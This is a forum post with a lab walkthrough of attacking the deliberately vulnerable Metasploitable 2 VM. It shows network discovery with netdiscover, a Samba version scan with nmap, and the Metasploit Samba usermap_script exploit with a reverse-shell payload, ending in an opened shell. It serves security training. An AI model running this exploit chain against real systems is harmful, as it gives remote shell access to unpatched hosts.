crossbower Posted February 1, 2014 Report Posted February 1, 2014 (edited) Pentest on Metasploitable 2The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24 Currently scanning: 192.168.1.0/24 | Screen View: Unique Hosts 8 Captured ARP Req/Rep packets, from 8 hosts. Total size: 372 __________________________________________________ ___________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.1.91 08:00:27:4a:6c:50 01 042 CADMUS COMPUTER SYSTEMS 192.168.1.202 08:00:27:32:43:96 01 042 CADMUS COMPUTER SYSTEMS 192.168.1.1 00:25:53:3e:bc:b9 01 042 Unknown vendor 192.168.1.100 00:09:f8:65:35:64 01 060 UNIMO TECHNOLOGY CO., LTD. 192.168.1.132 00:21:9b:20:a3:bb 01 060 Unknown vendorUsing nmap scanner for identif. port 139 Samba service.root@kali:~# nmap -p 139 -sV 192.168.1.91Starting Nmap 6.40 ( http://nmap.org )Nmap scan report for 192.168.1.91Host is up (0.00017s latency).PORT STATE SERVICE VERSION139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)And play game :root@kali:~# service postgresql start && service metasploit start && msfconsolemsf > use exploit/multi/samba/usermap_scriptmsf exploit(usermap_script) > show optionsModule options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target portExploit target: Id Name -- ---- 0 Automaticmsf exploit(usermap_script) > set RHOST 192.168.1.91RHOST => 192.168.1.91msf exploit(usermap_script) > set PAYLOAD cmd/unix/reversePAYLOAD => cmd/unix/reversemsf exploit(usermap_script) > set LHOST 191.168.1.19LHOST => 191.168.1.19msf exploit(usermap_script) >msf exploit(usermap_script) > exploit[*] Started reverse double handler[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo BgB1yKJSt3wbArQy;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: commandnot found\r\nBgB1yKJSt3wbArQy\r\n[*] Matching...[*] B is input...[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)VIDEO TUThttp://www.youtube.com/watch?v=S3uvS3qEpm8 Edited February 2, 2014 by crossbower Quote